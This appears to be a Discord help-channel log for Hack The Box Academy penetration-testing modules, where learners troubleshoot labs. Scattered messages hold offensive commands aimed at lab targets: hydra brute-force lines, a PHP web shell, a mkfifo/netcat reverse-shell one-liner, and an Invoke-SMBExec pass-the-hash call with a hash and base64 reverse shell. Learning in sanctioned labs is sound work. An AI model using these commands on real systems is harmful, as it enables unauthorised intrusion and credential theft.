#modules

1 messages ยท Page 77 of 1

tawny mango
#

im a noob at coding lol

#

what do I do here?

glacial hazel
#

hack

tawny mango
gentle root
#

Got it :)! The issue I was facing was the HTB academy not elaborating which command is ran where so I was trying to forward remote ports on wrong server ๐Ÿ˜ฆ But thanks for the help. Scanning is still a pain in the but, I'm not sure what a good scanning strategy is

glacial hazel
tawny mango
gentle root
tawny mango
#

I use online gdb rn

gentle root
#

Oh sheet you're next level

tawny mango
#

on school chromebook and linux is blocked

glacial hazel
#

chromebooks use linux kernel

tawny mango
glacial hazel
#

I should have an affiliate link

tawny mango
#

ok

#

lemme dm myself and then ill gmail myself the same thing

glacial hazel
tawny mango
#

ok

#

now ill just gmail myself later

#

is there a way I could invite the @compact patrol bot into my server?

balmy radish
tawny mango
naive field
#

im on 5min

#

50min*

#

right now ๐Ÿ‘€

#

lol

#

i used|| hydra -L username.list -P password.list ftp://ip ||

empty fog
#

Hello, I'm currently on the "ATTACKING COMMON SERVICES - Attacking FTP" module an there is a question "What port is the FTP service running on?". When I run nmap there is no FTP server running on the machine. I'm missing something?

autumn pilot
#

22 is ssh

#

If you don't see an FTP service running, then reset the target

cunning prairie
empty fog
empty fog
autumn pilot
#

Reset the machine again

#

Give it a few minutes and try, if that doesn't work => reset

glacial hazel
#

Nmap checks a text file to determine which ports are usually running on these ports

#

and displays them

#

With a service/version scan, Nmap sends various requests to determine the service

#

so you could do this:

nmap -p22,53,139,445 -sV 10.129.203.6 
#

but maybe something is wrong with the machine too, it seems weird that it would try to "trick" you like that in a learning module but idk ๐Ÿ˜„

#

I haven't done the module

cunning prairie
#

i reviewed my notes for this one, this one is a reset and check all ports issue. a bit annoying.

empty fog
glacial hazel
#

ohh okay then yeah seems to be something wrong with the machine then

empty fog
#

What now? I should write to the support? Or the support is periodically checking discord?

glacial hazel
#

ask @cunning prairie ๐Ÿ˜„

cunning prairie
#

you may have to reset several more times. the answer is not always a default port.

empty fog
#

Thank you guys. I restarted the machine several times and now it works. โค๏ธ

cunning prairie
naive field
#

but i waited for it to go to the end and nothing got cracked...

#

its password attacks easy lab

heady tusk
#

Command looks good. You might want to use -t to speed up the process.
If you ran through everything without success, redownload the lists and try again. Also make sure you don't have any connection issues

heady tusk
#

I used 64. That's a bit brutal but seemed to work

glacial hazel
#

to speed things up

#

Are you sre the username is correct @naive field ?

naive field
#

im trying it just to make sure

naive field
glacial hazel
#

let me see the command

glacial hazel
#

so you waited until the command finished?

#

and no credentials were found?

naive field
glacial hazel
#

well it seems the credentials are not in that wordlist ๐Ÿ˜„

naive field
glacial hazel
#

where did you get that wordlist?

#

did the module say to use it?

naive field
naive field
#

so there is no instructions

glacial hazel
naive field
glacial hazel
#

ohh

#

hmm

naive field
glacial hazel
#

so strange ๐Ÿ˜„

naive field
#

๐Ÿคทโ€โ™‚๏ธ

#

i swear every section i need to f-up something

#

especially this pw attack module

glacial hazel
#

i mean the command you're using is definitely correct

#

and if it gave you that those wordlists.. then i would definitely expect the credentials to be there

#

perhaps it's something wrong with the machine ?

naive field
#

i did it earlier today

#

and nothing

glacial hazel
#

idk maybe reach out to support, it seems like it's a problem with the machine

heady tusk
# naive field

Lists should be alright. The number of attempts matches my notes

glacial hazel
#

if they gave you the wordlist, then it should be in there

naive field
heady tusk
#

I'll rerun the command and see if I run into similar issues. Maybe I can figure out what's wrong here

naive field
heady tusk
#

Command is running. We'll see

naive field
heady tusk
#

Mine is running at not even half your speed so it's not done yet ๐Ÿ˜„

naive field
#

i realised mine is the slowest since its on pwnbox :D

heady tusk
#

Would be interesting to know why yours is that much faster though. I have no clue

#

Ah okay pwnbox being faster than VPN does make sense

#

Yep. It cracked it

naive field
#

:/

#

ig im just an unlucky person haha

heady tusk
# naive field

It says that 62 threads didn't complete. There's a chance one of them is the one you're looking for

#

Not the problem here

naive field
heady tusk
#

In general, yes, but I've been doing the exact same thing without issues.

naive field
#

even when i dont use -t for more stability same sh*t

heady tusk
#

I didn't run into that issue yet so dunno how to fix it. Maybe google has some quick fixed to offer?

severe rose
#

Hi guys i am doing the module shells and payloads but i am stuck on this question. I found that i have to use the 50064.rb exploit with msfconsole but when i run the exploit i receive an error

#

This error

#

The settings that i used are these :

rustic sage
#

from i can get a good wifi adapter

heady tusk
severe rose
#

Set vhost now : blog.inlanefreight.local but same error

#

I Change the targeturi in / and after the run command i have some new errors now.. something is moving

severe rose
molten saffron
#

hii

#

i am new

glacial hazel
heady tusk
molten saffron
#

i am good

#

but not very good

glacial hazel
naive field
#

?

iron plaza
#

Anyone finished the Footprinting module DNS section? I need to understand a couple of things that I don't believe I understood properly. Please let me know so I can dm

manic magnet
#

Depending on what the questions are I might be able to help. You can dm me

iron plaza
sick mural
#

Hi all, I am having little technical issue in connecting to the target machine machine over ssh. I can ping the target machine but i cannot ssh it. I see 22 is open but i dont get the connection . However when i try to ssh same target from pwnbox i get the yes/no question for connection and get log in to target. can some one assist what could b wrong?

manic magnet
#

Are you connect to pwnbox and vpn?

autumn pilot
#

Which module and section?

severe rose
sick mural
#

i saw pwnbox and vpn has same ip addresses so i terminated it. but still not working.

#

getting same error again and again after some time.

autumn pilot
#

From which module and section is the target that you've spawned

sick mural
#

I can ping though.

manic magnet
sick mural
#

Reset the target. and did the ssh again same error received.

#

pwnbox is already disconnected a while ago.

manic magnet
#

Did you use the new IP? Because it looks like you used the old one

sick mural
#

target happen to spwan with same ip again and again.

manic magnet
#

Try refreshing the webpage

sick mural
#

see the ping drops and reappearance

manic magnet
#

And see if the IP changes

sick mural
#

let me do this now.

#

did this 4 times . same IP everytime. One more thing this problem came in from 2 days back when i tried to connect to the htb season labs vpn and disconnected it. I also tried downloading the new version of openvpn config file 3 times but same issue.

manic magnet
sick mural
#

Got this. Shall I email them?

#

or is there any active chat around here?

manic magnet
#

Button right

#

Bottom

sick mural
#

yes still searching ๐Ÿ™‚

manic magnet
#

@sick mural

zinc marsh
#

is there anyway to read a file with smbclient?

polar widget
#

Get-GPPpassword.ps1 didn't fetch anything

sick mural
polar widget
#

Weird

#

Anyone faced this issue in windows attacks and defense module?

earnest ginkgo
#

Hi, i am doing the module Windows Attacks & Defense. I just did the first Kerberoasting Attack, and now I need to get the ServiceSid of the user webservice. I think i did found it but the answer is wrong. Can someone help me plz ?

polar widget
#

I've recently done it, few mins ago

broken warren
#

for the cracking passwords with hashcat module the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat, Is the hash not loading supposed to be part of it? I copied everything verbatim from the examples and when i go to run my .hccapx through hashcat it says no hash loaded. But it seems like it converted fine when i did my ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx.

earnest ginkgo
polar widget
#

Please copy paste it, and check whitespaces

earnest ginkgo
#

Thx

polar widget
#

Indeed

supple parcel
#

MrR3boot

rustic sage
#

Hello there i think something wrong with connecting to academy ovpn

acoustic owl
rustic sage
#

Yea that is what mine always looks like ^^^

#

Why is is that the active subdomain enumeration section of the information gathering module gives me a command that is not working?

#

Server: 192.168.189.2
Address: 192.168.189.2#53

** server can't find inlanefreight.htb: NXDOMAIN

acoustic owl
rustic sage
#

My bad, the query is for "inlanefreight.htb"

#

I just copied the command from the module

#

Idk why it won't let me add a screenshot rn

rustic sage
acoustic owl
acoustic owl
# rustic sage My bad, the query is for "inlanefreight.htb"

htb is not an official TLD. This means that the root nameservers cannot resolve this TLD.
So you have to specify a nameserver in your request, which has the corresponding zonefile.

dig NS inlanefreight.htb @NameServerIP(Target from Module)
nslookup -type=NS inlanefreight.htb NameServerIP(Target from Module)
thorn cosmos
#

Hey guys, I'm stuck at module footprinting - DNS. the 4th exercise just make me die!! Tried almost all wordlists from seclist. I can't figure out what I'm doing wrong. Any advise?

acoustic owl
fathom pendant
#

And a fierce hostlist

#

Dnsenum can be run on subdomains of subdomains

quick cairn
#

Hi, i'm doing the Login Brute Forcing with Hydra,
on skill assesment: Website second question:

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

anyone has an hint for solve?

i have tried
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.124.101 -s 32341 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"

woeful ermine
quick cairn
woeful ermine
#

sure

rustic sage
#

For some reason I am finding this section impossible(Active subdomain enumeration), can I dm someone to clarify and ask a question?

jaunty vigil
#

getting this error while importing the private key in attacking a uthentication mechanisms:

rustic sage
#

I can curl webserver and ping IP but can't see it on the web browser
so i was on the internet investigating and found this, could anyone help me

livid steeple
#

Hi, ๐Ÿ‘‹ I'm new here. Hope to learn lots.

rustic sage
fathom pendant
#

This isn't the place for introductions

severe rose
#

Module shells and payload : after run the 50064.rb exploit i receivw this error.. i am going crazy.

livid steeple
fathom pendant
#

Mild change is that it's /verify not ++

subtle glen
#

AD enum & attacks, Misc missconfiguration, how do i ssh in via powershell? i tried ssh htb-student@ip, it asked me for a password, i entered the password provided by the module in the beginning when it says i might need to ssh and explains how too but it keeps rejecting the password, i tried reseting the lab multiple times

rustic sage
#

I am struggling to find the txt record, in the information gathering web edition - active subdomain enumeration section

#

I am trying everything in the module, but I beleive I am missing something important

subtle glen
rustic sage
#

Ok, thanks Ill look at that now

#

Just solved the remainging 4 questions instantly lol

#

that was so easy with the notes I took from the footprinting module

#

thanks

subtle glen
dim light
#

hey guys
when i want create a virtualenv with python2 to use tplmap tool i get an error (im in server-side module )
anybody is here to help me?

manic magnet
dim light
#

can u help me?

autumn pilot
#

what is the error

dim light
jaunty vigil
#

any1 do the osint module ?

autumn pilot
#

Hint: Inspect

acoustic owl
#

Or use: *** is the leading solution to find and verify professional email addresses

autumn pilot
#

it is easier than you think, don't overcomplicate it

jaunty vigil
#

oh lmfao

#

with "jeremy"

analog tendon
#

has anyone thats done the server side attacks assesmtn available for assistance?

jaunty vigil
#

i don't but i solved it so it is what it is

#

lmfao

#

not a bad module
i woulda liked to see a linkedin page and some fake employees to track down
that woulda been a bit more interesting
ex-employees
some waybackmachine maybe
but overwall it was neat

#

if i finish a module and it is later updated, do i need to purchase it to do the new content, or will i have access to it?

zinc marsh
#

someone can help me in the module: attacking common services - Section: sql databases

acoustic owl
jaunty vigil
#

same if I got it through business?

zinc marsh
#

i have enumerated all the dabatase and logged in as well in the other ports and i couldnt find nothing

acoustic owl
jaunty vigil
#

hm dang

#

@autumn pilot do you know if this is the same for business account users?

autumn pilot
#

can't recall, sry

jaunty vigil
#

np

acoustic owl
zinc marsh
#

am using mssqlclient

acoustic owl
random charm
#

Can someone please help me ๐Ÿ˜ญ

acoustic owl
rustic sage
#

I may be overlooking something in the virtual hosts section of information gathering web edition, but what is "./vhosts" referring to?

random charm
#

Someone took my Instagram and Snapchat account

analog tendon
#

lol this isnt the place for that

acoustic owl
random charm
#

How

analog tendon
#

you can google instagram or snapchat and after it put "support"

acoustic owl
#

in this case vhosts is a file

rustic sage
#

yes

#

i think i have it now, is this where the path to my wordlist goes?

#

Is there a place I can put feedback for something to add to a module ?

analog tendon
#

For the serverside assessment, i found the attack surface and am able to read files. i was able to read the /etc/passwd and /etc/shadow files but i cant seem to find the flag.txt. i have a feeling they changed the name of it for this assessment but i cant seem to find it. any hints?

analog tendon
rustic sage
#

Ok, I got it now. I thought the ./ was calling a script or sm that I wasn't seeing

west gazelle
#

Hello, everyone.
I am stuck "Password Attacks Lab - Hard"...
I cracked B**.v**'s password.
Could you please DM ok?

fathom pendant
misty current
#

I've tried switching the VPNs and on PwnBox but I'm still not able to interact with the RPC

#

Am I performing something wrong or it's a platform issue?

fathom pendant
#

Is that the IP the spawn target gave you?

misty current
#

Yup

fathom pendant
#

Also please just say module and section name

misty current
#

SMB

fathom pendant
#

Footprinting?

misty current
#

Footprinting - SMB

#

Yup

fathom pendant
#

Kk you've done the other parts up to this point yes?

misty current
#

The other parts, you mean in this particular section right?

#

SMB

#

Then yes

#

The ones before were FTP and the ones before that is Footprinting/OSINT stuff

steady hawk
#

Can you ping the address?

fathom pendant
#

^

misty current
#

Yup

fathom pendant
#

is the 445 port open?

misty current
#

In fact I'm able to enumerate shares on it too, which is related to the same section

fathom pendant
#

weird

#

then

#

try resetting the target

misty current
#

I see the RPC port open on 111 but

fathom pendant
#

and connecting again

steady hawk
#

Maybe try adding the -N option before the ip for no-pass

fathom pendant
#

give it a moment

#

-N doesn't matter for the -U "" option

#

because you're telling RPC that you're connecting with a null session

steady hawk
#

It just won't prompt you for a password

misty current
#

I've tried resetting too. But giving it a moment- I haven't done that

#

Let me do that

fathom pendant
#

@misty current do you have a space between your quotes?

#

hard to tell sometimes in cmd line

misty current
#

Oh I don't think I added a space

#

Nope didn't add it, just confirmed

fathom pendant
#

cool but yeah try giving it like a minute after spawn

misty current
#

Sure

fathom pendant
#

I was able to connect to it just fine :)

fathom pendant
lilac niche
#

Hey! Anyone interested in helping a noob?
I have just started from zero and and unlocked the module: Windows fundamentals, and already stuck in the first question *( "What is the Build Number of the target workstation?" I am supposed to use the instance provided by HTB, but when I write the given code, it doesn't work! what am I doing wrong?

misty current
fathom pendant
#

Were you able to connect?

fathom pendant
misty current
#

I didn't get any prompts for passwords tho

steady hawk
misty current
#

did you specify any ports? @fathom pendant

fathom pendant
#

No

#

Try using a different VPN connection

#

Or switch from tcp to UDP or vice versa

misty current
#

let me try TCP

#

The switch to TCP for VPN didn't work either

fathom pendant
#

Try changing VPN region the

#

Then* this will require a lab reset

misty current
#

which region do you have yours set to?

fathom pendant
#

Us academy 1

lilac niche
#

@fathom pendant I am using the interactive instance, not my windows. this is what it looks like:

fathom pendant
#

You can't post screenshot

fathom pendant
fathom pendant
#

Click the button if you haven't spawned the target

#

It should give you an IP

lilac niche
#

Did that

fathom pendant
#

Ok so what are you having trouble with exactly

#

Using rdp to connect to the IP?

#

Because the interactive pwnbox is NOT the target

misty current
#

No luck with the region switch either.

fathom pendant
#

Interesting

misty current
#

I supposed I'll have to try this module some other day

fathom pendant
#

And you reset target after switching regions (make sure you redownload the VPN config, end the current openvpn and start a new one)

misty current
simple zephyr
#

For Windows Priv Esc Assessment II is this normal behavior after I complete the exploit. I have the last flag from using the meterpretershell, but can't keep it stable enough to get the second.

meterpreter > net user administrator password
[-] Unknown command: net
meterpreter > shell
Process 836 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.592]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user administrator password

Terminate channel 1? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > 
misty current
#

I'm making sure to download a new VPN everytime lol

fathom pendant
#

Lol you don't need a new VPN every time

misty current
#

I've been pushed to resort to this xD

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

lilac niche
#

This is the code to connect to target: xfreerdp /v:<10.129.68.64> /u:htb-student /p:Academy_WinFun!
I get an Eror when I type this in the Parrot terminal

fathom pendant
#

I'd contact support on the site then since it looks like a weird issue

fathom pendant
lilac niche
#

same error

misty current
#

I'll have to skip this for now.

#

Thanks anyways @fathom pendant

zinc marsh
#

someone know how to log in with a hash in mssql?

fathom pendant
acoustic owl
zinc marsh
#

but i cannot log in with the password

#

and i have readen in the forum that i need to log in with the hash

lilac niche
acoustic owl
fathom pendant
naive field
#

finally finished with pw attacks

#

hell on earth

#

xd

south aurora
#

can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP in the index.php file for thos. "Victim IP: {$_SERVER['REMOTE_ADDR']}

polar widget
#

3rd question in this module

#

windows attacks and defense, the problem is that, after attempting to log into DC1 with the said credentials, and checking in the Event Viewer in DC1, there's no activity registered on the username bonni

fathom pendant
#

Module name and question?

polar widget
#

so I tried to log into it multiple times, as it was supposed to fail,

fathom pendant
#

That's the new one yea?

polar widget
#

I checked each one of Event ID 4771, manually, none of them had bonni username

fathom pendant
#

Is that the eid it's looking for?

polar widget
#

yup, the hint suggested it + even without the EID, looking for just the username bonni doesn't yield a thing

#

183,402 EIDs logged, no less

#

and I have switched back and forth 3 times ig, no changes

#

logging off now

fathom pendant
#

Gotcha interesting if I ever run this

livid pier
#

anyone finish this question from PrintSpooler & NTLM Relaying? Windows Attacks and Defense, IU keep getting this error when running dementor

tribal plume
#

In the Attacking Common Applications module did anyone else have trouble getting the Metasploit modules to work on the Jenkins and Tomcat targets? I've tried the suggested exploits and I just get the "Exploit completed but no session was created" result.

tribal plume
vagrant gust
#

i need some help the dns section of the footprinting module

#

i know what subdomain to brute force

#

but every time i try brute force the query times out

#

this is for the What is the FQDN of the host where the last octet ends with "x.x.x.203"? btw

woeful ermine
vagrant gust
#

dnsenum --dnsserver 10.129.236.33 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt --threads 90 dev1.inlanefreight.htb

woeful ermine
#

is this dev ip in your /etc/hosts

vagrant gust
#

wdym

bold rapids
#

So we are not allowed at all to ask for help on active machines? like MonitorsTwo. Is it just waiting for a walkthrough to comeout my best option?

woeful ermine
#

this is for academy modules only

bold rapids
#

ok. thanks

vagrant gust
tribal plume
woeful ermine
tribal plume
#

And a forum post.

bold rapids
#

no help

vagrant gust
thorn urchin
#

if you already knew the subdomain you wouldnt have had to look it up

#

so youre very likely fundementally misunderstanding the question

vagrant gust
thorn urchin
#

if it is then you ought to have the FQDN already

vagrant gust
#

im so lost

thorn urchin
#

whats a FQDN

vagrant gust
#

cuz i cant do dig axfr on that

fathom pendant
#

For dnsenum

vagrant gust
fathom pendant
#

Dnsenum brutes it

vagrant gust
#

the return dns

thorn urchin
fathom pendant
#

Also I don't think dev1 is a subdomain

#

For that question

vagrant gust
fathom pendant
#

And section

vagrant gust
#

i pasted the wrong input

vagrant gust
thorn urchin
#

no

#

re read the section information again

vagrant gust
#

will do

fathom pendant
#

A.b.tld

#

Where tld is the top level domain (example.com

vagrant gust
thorn urchin
#

maybe

#

you tell me

vagrant gust
#

๐Ÿ˜‚

#

this is torture

fathom pendant
#

That spoils it if we just tell you :) but the answer will be in the form of a.b.inlanefreight.htb

vagrant gust
#

ok thanks for the help

glacial hazel
fathom pendant
#

So it's not digging too hard into it

vagrant gust
#

running on no sleep

glacial hazel
#

go to bed do it later

#

big brain time

vagrant gust
#

just feel like im too close to stop

#

its addicting

fathom pendant
#

If you're struggling then best advice is to walk away and come back later

#

You shouldn't generally be struggling super hard as you've got the info almost all correct. But definitely double check all of the more fierce hostlists in the seclist directory

static roost
#

I know this is old but I think I know why your can't access Admins stuff and what you need to do in order to achieve that. If you wanna chat about it, hit me up.

fathom pendant
static roost
#

I know lol but I was trying to figure out why and figured it out myself. Now I must share the glory.

fathom pendant
#

Lol yeah responding to messages 1+ month ago most people are gonna be confused

static roost
#

pepehands im tryn

fathom pendant
#

In general, if it's 1+ week it's almost never worth replying lol

woeful ermine
#

I added a user to admin group then created another user and added it to the admin group. Both didnt work at all. they were in the admin group alright but couldnt access to admin desktop.

#

disconnecting and restarting didnt work neither

polar widget
polar widget
steel kite
#

๐Ÿ˜ฎโ€๐Ÿ’จ

thin citrus
#

guys im doing linux fundamentals I need some help lol

grand bane
#

Hello guys in the section RDP and SOCKS Tunneling with SocksOverRDP I'm trying to load SocksOverRDP.dll but Windows says operation not permitted, I already checked the antivirus and firewall but all is turned on, how should I do ?

autumn pilot
#

disable defender

grand bane
autumn pilot
#

make sure also that you are using an elevated prompt

grand bane
#

yes I do

zinc sentinel
sinful falcon
#

Hello world, I'm on Documentation & Reporting module and Documentation & Reporting Practice Lab, I don't find command injection where is for report. Need a hint, thanks

thin citrus
zinc sentinel
thin citrus
#

the question is "what is the path to the htb-students mail"

#

im on kali linux

autumn pilot
#

seems like defender is still on

#

as the dll is being flagged

grand bane
#

that's rlly strange

thin citrus
#

and ive connected into the sshso im in the machine

grand bane
autumn pilot
#

not defender firewall, but windows defender

#

the AV

winged zodiac
#

Module: Pivoting

Section: Skill Assessment

Question: 5th "In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"

Hint: We may be able to find something stored in LSASS.

I have been in this question for days after getting the RDP of m*** user. Any help or hints to move forward would be appreciated

autumn pilot
thin citrus
#

ok btw i got all the questions right on HTB

#

im going to bed lol

grand bane
brave sail
#

What is the method to download from Sysinternals? I can't access the internet from the spawned windows session.

glacial hazel
#

Download it to your host with the VPN

#

and transfer it

brave sail
#

okey okey

rustic sage
#

hello

#

i need one help

#

can we get ip address through phone number or any social media account?

#

i have tried soo many ways but it was useless

#

if someone can help

glacial hazel
#

Why

#

Also this is not the right channel for such a question, move to #general

glacial hazel
#

Idk maybe you were banned ask the mods

rustic sage
glacial hazel
#

Ask mods

rustic sage
#

can you pls call the mods

#

hello any mod there?

dim hound
dim hound
#

No

rustic sage
#

ok

frozen vapor
#

Hello, do you have any luck with these? I have the same issue. Thank you.

pliant wolf
#

Hey guys,

am stuck at SMB enumeration

the question is simple and IDK what am not getting

What is the full system path of that specific share?

glacial hazel
pliant wolf
#

okay,

glacial hazel
#

it's a question ๐Ÿ˜„

#

can you execute commands on the machine?

odd notch
#

Hi trying to figure out how to find he admin email in the Footprinting module imap/pop3 section. I logged in as it said in the section, but I can't find anyway to find what users the service have... the ID command just gives the same results no matter what I wass, and the list "" * just give me directories... I went over the section again and again trying to find how to do it. but I didn't.

pliant wolf
#

am using VM, so i can

#

am on linux

glacial hazel
#

What command are you using to list the shares?

pliant wolf
#

am using rpcclient to list the shares netshareenumall

#

i can see the path, but the answer is wrong

#

it is expecting a linux path

glacial hazel
#

what is the path?

pliant wolf
#

C:\home\sambauser\

odd notch
#

Does a windows machine have a C:\home\ ?

#

๐Ÿ˜‰

pliant wolf
#

noo xD

#

I know it is linux

#

BUTTT

#

My question is that why would rpcclient reveal a wrong path?

glacial hazel
#

?

odd notch
#

Welp, have you ever used WSL?

glacial hazel
#

what do you mean ๐Ÿ˜„

pliant wolf
#

Am not sure what i mean xD

But umm i tried entering /home/sambauser/

#

as an answer, it didnt take it

glacial hazel
#

have you tried entering the path that is shown in the output of netshareenumall?

pliant wolf
#

yupp thats what netshareenumall shows C:\home\sambauser\

vocal coral
#

hi, can anyone help me for this question? What is the FQDN of the host where the last octet ends with "x.x.x.203"?

glacial hazel
pliant wolf
vocal coral
pliant wolf
#

netname: sambashare
remark: InFreight SMB v3.1
path: C:\home\sambauser
password:

cinder edge
#

Guys what is the benefits in VIP+ subscription

Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...

Which will be great decision?

pliant wolf
#

I tried to login to the share sambashare , just got the flag but no clue about the path

odd notch
#

btw I still have no thread how to find the admin email ๐Ÿ˜ฆ

vocal coral
#

but got stuck with this

odd notch
#

nvm

acoustic owl
vocal coral
pliant wolf
#

:))

pliant wolf
vocal coral
acoustic owl
glacial hazel
vocal coral
pliant wolf
#

from the previous question*

glacial hazel
#

hmmm

pliant wolf
cinder edge
#

Guys what is the benefits in VIP+ subscription

Because I plan to do some Course in some Institute and also I have plan to get VIP+ in htb to learn hacking so I am confused to do because I am poor in money..
Guys any one have idea pls guide me ...

Which will be great decision?

glacial hazel
pliant wolf
#

dayummm bro

#

hahahaha

#

omGG

glacial hazel
#

that worked?

pliant wolf
#

yeah xD

glacial hazel
#

lmfao

#

ez

pliant wolf
#

hahahaha

#

can i like give you some 10 star rating xD

frozen vapor
vocal coral
glacial hazel
odd notch
#

Hello?

pliant wolf
#

thanks buddy!

cinder edge
#

@vocal coral OK then I don't want to go for any institute right

glacial hazel
odd notch
#

I can... but I don't think there is a way to list emails there?

vocal coral
vocal coral
celest light
#

hi, im doing the windows privilege escalation module and im stuck at a part where i need to do uacbypass to get elevated shell, tried a couple of techniques and it didnt worked, can someone pm me?

acoustic owl
timid pollen
#

hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

still stuggling with this... i am only able to get htb-student hash and not user SCCM_SCV ..

glacial hazel
odd notch
#

0 messages

glacial hazel
#

wat

#

da hayul

#

so strange ๐Ÿ˜„

odd notch
#

spoiler

cinder edge
#

@vocal coral yes I know that but am asking that HTB or offline institute will be right place to learn from 0 to pro?

glacial hazel
odd notch
glacial hazel
#

wtf lol

#

so it says you're supposed to get the admin email from the POP3 server?

acoustic owl
odd notch
#

or the imap one

compact patrolBOT
glacial hazel
#

cuz it seems like the POP3 is empty

odd notch
#

I gtg be right in like 1h

cinder edge
#

@acoustic owl okay ๐Ÿ˜Š

odd notch
#

shoping for the weekend

glacial hazel
#

swag

fathom pendant
#

This IMAP 101 post is the third of our how-to tutorials designed to help you interact with open, text-based protocols in the email industry. What is IMAP?

An overview of the main IMAP commands that a client can send under RFC 3501 (and others). What the command does. Plus small example snippets.

#

Really helpful links

zinc thunder
#

Hey! need some tips. module "getting started" - Knowledge check. i'm able to print the id with "<?php system ('id'); ?> when i set up a nc listener and run <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> nothing happens, tried a couple of other shells with same result. any tips?

glacial hazel
#

I usually do <?php echo system($_GET['cmd']);?>

#

and then visit http://<ip>/<page>.php?cmd=<revshell command>

zinc thunder
#

I'll try, thanks

sick mural
#

Hi, In File transfers->Miscellaneous File Transfer Methods . one has to practice transfering files via nc from attack > to victim. but victim machine (windows machine) dont have nc installed on it. also if you try to download , it tips the AV which deletes the executable file. Any idea how to use nc on windows box?

shut ice
#

Hello can someone help me in this question:

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
This question is in public exploits
What are the steps to do it?!

fathom pendant
#

Well first you visit the IP:port it gives you
Second you use the msfconsole or searchsploit as suggested to exploit the vulnerability of the specific plugin

shut ice
#

I did them but i cannot reach the flag.txt

fathom pendant
#

Well in the exploit you should be able to change the filepath

shut ice
#

Which one of the exploits should i use there is a big list of exploits for wordpress

fathom pendant
#

Well you're looking up the wrong thing then

#

Hint: it's the plugin being used

#

They're even nice enough to tell you the version it's running

shut ice
#

I searched for this one and it did not work

#

I found an exploit for wordpress plugin 2.7.10 but it also did not work

#

It does not give me what i need

fathom pendant
#

One moment

zinc thunder
fathom pendant
#

(note file_read is only part of the full msfconsole exploit name you use)

cinder edge
#

Guys what is personal instance in server

urban anvil
#

hi guys I am in the SQL Injection Skills Assessment. 'Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.' Can someone give me a hint on how can i approach this?

dim hound
#

first try to identify an valid injection point @urban anvil

urban anvil
fathom pendant
dim hound
rustic sage
#

how do I get nessus working during the skills assessment in the pwnbox? It giving me an error when I try to start it.

fathom pendant
rustic sage
glacial hazel
#

on your local host

fathom pendant
rustic sage
#

nope

fathom pendant
#

What is your rdp command?

rustic sage
#

it says the connection has timed out

#

on firefox

#

xfreerdp /u:htb-student /p:'HTB_@cademy_student!' /v:10.129.201.248

glacial hazel
#

what does ping 10.129.201.248 show

#

it seems like that host is down psyduck

rustic sage
#

its slow but it is responding

glacial hazel
#

the module says you're supposed to RDP into the box?

rustic sage
#

ah finally it worked

glacial hazel
#

lets go

#

hacker moment

rustic sage
#

no but I saw that in the discord that some people had to do that

#

lol

fathom pendant
#

Idk regarding pwnbox if it's running by default

cinder tinsel
#

PTH module guys, i dont get the rev shell at all. i am running nc as admin and runign rev from Julios powershell.exe prompt. please, any hint? i have tryied different ports

glacial hazel
#

you don't need to run nc as sudo if that's what you mean by admin

cinder tinsel
#

yeah, i just "run as administrator"

glacial hazel
#

windows has netcat?

cinder tinsel
#

yes

#

on the lab

glacial hazel
#

oh

glacial hazel
late isle
#

hi all , i am currently working an the module "attacking common services" i am stuck with an issue on the questions about the ftp service . What port is the FTP service running on? . but when i scan the ip there is no ftp service running. there are other services though. someone had the same issue ?

cinder tinsel
#

nc.exe -lnvp

glacial hazel
#

no port?

cinder tinsel
#

nc.exe -lnvp 443

glacial hazel
#

what what's the command you're using for the rev shell

fathom pendant
#

I didn't think you needed to rev shell with the pth section

#

But it's been a bit

winged zodiac
cinder tinsel
cinder tinsel
tribal plume
cinder tinsel
#

who should i report this lab/ it is broken for sure

fathom pendant
#

What module is this?

cinder tinsel
#

i am doing things right. yes, i am importin-module invoke-smbexec....

#

the commanda as being executed ,but no reverse shell at all

#

import-module*

fathom pendant
#

Interesting and you're following the examples (changing IP where appropriate

#

Also by module I meant academy module

cinder tinsel
#

yeah, thats my invoke-smbexec command: Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command " powershell -e Base6shellcode"

small sage
#

I had some trouble with this the other day, which prompt on revshell are you using?

cinder tinsel
#

powershell

#

base64

small sage
#

Are you using powershell #3 and selecting Base64 from the drop down menu or the one titled powershell #3 (base 64)?

cinder tinsel
#

powershell #3 (base 64

small sage
#

Thatโ€™s the one that worked for me, did you try wmiexec?

cinder tinsel
#

yeah i tried both

#

i will try the one that worked for you. it might be somethign with the base64

#

one sec

small sage
#

Yeah Iโ€™d try a few more of the shell commands, make sure the module is importing correctly as well, itโ€™s almost always something dumb being overlooked

#

At least for me

cinder tinsel
#

what port did you use?

small sage
#

I used 9000 something

cinder tinsel
#

didnt work.

#

i have tried all possibilities. there is something wrong with the lab

small sage
#

Dm me some screenshots of your terminal?

cinder tinsel
#

sure

cinder tinsel
summer flame
#

Hi there, I need some help/assistance on the bypassing Web Application Protections - case 9 and case 11?
I tried the following but it didn't work. I think I understand something wrong.
